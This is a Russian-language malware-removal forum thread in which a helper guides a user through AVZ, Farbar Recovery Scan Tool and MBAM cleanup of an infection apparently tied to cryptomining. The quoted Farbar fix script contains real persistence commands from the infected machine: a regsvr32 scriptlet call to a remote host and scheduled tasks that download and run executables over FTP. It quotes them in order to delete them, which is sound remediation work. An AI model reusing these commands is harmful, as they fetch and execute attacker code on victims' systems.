shkir741 0 Опубликовано 13 ноября, 2018 Share Опубликовано 13 ноября, 2018 Здравствуйте. В последнее время (неделю) заметил забитость оперативной памяти - 60 - 70 % , когда ничего не запущено. По диспетчеру считаю- и 20% нет, а 60- 70 показывает. Однажды заметил тодо lsmose. CollectionLog-2018.11.13-21.19.zip Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 462 Опубликовано 13 ноября, 2018 Share Опубликовано 13 ноября, 2018 Выполните скрипт в AVZ из папки Autologger begin QuarantineFile('C:\Windows\system32\themeservice.dll',''); DeleteSchedulerTask('Microsoft\Windows\Multimedia\Multimedia'); DeleteSchedulerTask('Microsoft\Windows\Power Efficiency Diagnostics\Power Efficiency Diagnostics'); BC_ImportAll; BC_Activate; RebootWindows(false); end. Обратите внимание: будет выполнена перезагрузка компьютера.Выполните скрипт в AVZ begin CreateQurantineArchive('c:\quarantine.zip'); end. c:\quarantine.zip загрузите по ссылке https://virusinfo.info/upload_virus.php?tid=37678Полученный после загрузки ответ сообщите здесь. Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи. 1 Цитата Ссылка на сообщение Поделиться на другие сайты
shkir741 0 Опубликовано 16 ноября, 2018 Автор Share Опубликовано 16 ноября, 2018 (изменено) Выполните скрипт в AVZ из папки Autologger begin QuarantineFile('C:\Windows\system32\themeservice.dll',''); DeleteSchedulerTask('Microsoft\Windows\Multimedia\Multimedia'); DeleteSchedulerTask('Microsoft\Windows\Power Efficiency Diagnostics\Power Efficiency Diagnostics'); BC_ImportAll; BC_Activate; RebootWindows(false); end. Обратите внимание: будет выполнена перезагрузка компьютера.Выполните скрипт в AVZ begin CreateQurantineArchive('c:\quarantine.zip'); end. c:\quarantine.zip загрузите по ссылке https://virusinfo.info/upload_virus.php?tid=37678Полученный после загрузки ответ сообщите здесь. Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи. Я дико извиняюсь, но куда должен прийти ответ от вирусинфо? А то двое суток вот это "файл закачан, спасибо" висит и ничего не приходит. Изменено 16 ноября, 2018 пользователем shkir741 Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 462 Опубликовано 16 ноября, 2018 Share Опубликовано 16 ноября, 2018 Давно пора выполнить все остальное Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи. Ответ на Вирусинфо я давно уже посмотрел Цитата Ссылка на сообщение Поделиться на другие сайты
shkir741 0 Опубликовано 18 ноября, 2018 Автор Share Опубликовано 18 ноября, 2018 Звиняйте за некоторую мою тупость, я не шибко продвинутый юзер. CollectionLog-2018.11.18-08.10.zip Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 462 Опубликовано 18 ноября, 2018 Share Опубликовано 18 ноября, 2018 Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе. Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением. 2. Убедитесь, что в окне Optional Scan отмечены List BCD, Driver MD5 и 90 Days Files. 3. Нажмите кнопку Scan. 4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. 5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt). 6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению. Цитата Ссылка на сообщение Поделиться на другие сайты
shkir741 0 Опубликовано 18 ноября, 2018 Автор Share Опубликовано 18 ноября, 2018 Логе : frst.zip Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 462 Опубликовано 18 ноября, 2018 Share Опубликовано 18 ноября, 2018 1. Выделите следующий код: Start:: CreateRestorePoint: HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp0930.host:280/v.sct scrobj.dll Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SPDriverInstall.lnk [2018-08-27] ShortcutTarget: SPDriverInstall.lnk -> C:\Program Files\MediaTek\SP Driver\SPDriverInstall (No File) C:\Users\Администратор\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom 2018-10-28 18:39 - 2018-11-18 19:02 - 000000336 _____ C:\Windows\pools.txt 2018-10-28 18:39 - 2018-10-28 18:39 - 000002497 _____ C:\Windows\cpu.txt 2018-10-25 16:48 - 2018-11-13 20:14 - 000000000 ____D C:\Users\Все пользователи\Windows 2018-10-25 16:48 - 2018-11-13 20:14 - 000000000 ____D C:\ProgramData\Windows 2018-03-17 21:42 - 2018-11-18 19:02 - 000000087 _____ () C:\Program Files\Common Files\xp.dat 2018-11-18 07:59 - 2018-11-18 19:59 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat 2018-11-18 10:01 - 2018-11-18 20:07 - 000003186 _____ C:\Windows\System32\Tasks\ok 2018-11-18 10:00 - 2018-11-18 20:07 - 000003520 _____ C:\Windows\System32\Tasks\Mysa 2018-11-18 10:00 - 2018-11-18 20:07 - 000003506 _____ C:\Windows\System32\Tasks\Mysa3 2018-11-18 10:00 - 2018-11-18 20:07 - 000003426 _____ C:\Windows\System32\Tasks\Mysa2 2018-11-18 10:00 - 2018-11-18 20:07 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1 2018-11-18 10:00 - 2018-11-18 10:00 - 015038553 _____ C:\Windows\SysWOW64\Drivers\64.exe 2018-11-18 10:00 - 2018-11-18 20:06 - 002359296 _____ () C:\Windows\debug\item.dat WMI:subscription\__TimerInstruction->fuckyoumm2_itimer: <==== ATTENTION WMI:subscription\__IntervalTimerInstruction->fuckyoumm2_itimer: <==== ATTENTION Task: {113C858E-A041-4E21-B255-F4051A7D4F4A} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp0930.host>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION Task: {28FE97AA-ACE2-4EFA-B87D-9F9EC02252FB} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa Task: {44355AA8-72F8-4CBD-A1DC-7865B758B913} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp0930.host>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION Task: {8390D9FE-7434-4459-AB24-DA4C6F533321} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION Task: {8C8A8E06-3C4B-452D-A4C5-57E995389661} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp0930.host>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION Reboot: End:: 2. Скопируйте выделенный текст (правая кнопка мыши – Копировать).3. Запустите Farbar Recovery Scan Tool. 4. Нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении. Обратите внимание: будет выполнена перезагрузка компьютера. Цитата Ссылка на сообщение Поделиться на другие сайты
shkir741 0 Опубликовано 19 ноября, 2018 Автор Share Опубликовано 19 ноября, 2018 Сделано Fixlog.txt Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 462 Опубликовано 19 ноября, 2018 Share Опубликовано 19 ноября, 2018 Что с проблемой? Цитата Ссылка на сообщение Поделиться на другие сайты
shkir741 0 Опубликовано 19 ноября, 2018 Автор Share Опубликовано 19 ноября, 2018 (изменено) Работает заметно бодрее, но все равно 15-20 % оперативы непонятно на что уходят. Изменено 19 ноября, 2018 пользователем shkir741 Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 462 Опубликовано 19 ноября, 2018 Share Опубликовано 19 ноября, 2018 Сделайте лог МВАМ Цитата Ссылка на сообщение Поделиться на другие сайты
shkir741 0 Опубликовано 20 ноября, 2018 Автор Share Опубликовано 20 ноября, 2018 Лог mbam: mbam.txt Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 462 Опубликовано 20 ноября, 2018 Share Опубликовано 20 ноября, 2018 Поместите в карантин МВАМ все найденное Цитата Ссылка на сообщение Поделиться на другие сайты
shkir741 0 Опубликовано 21 ноября, 2018 Автор Share Опубликовано 21 ноября, 2018 Сделано. 4 угрозы всплывают при повторной проверке. Проблема утечки оперативы осталась. Цитата Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.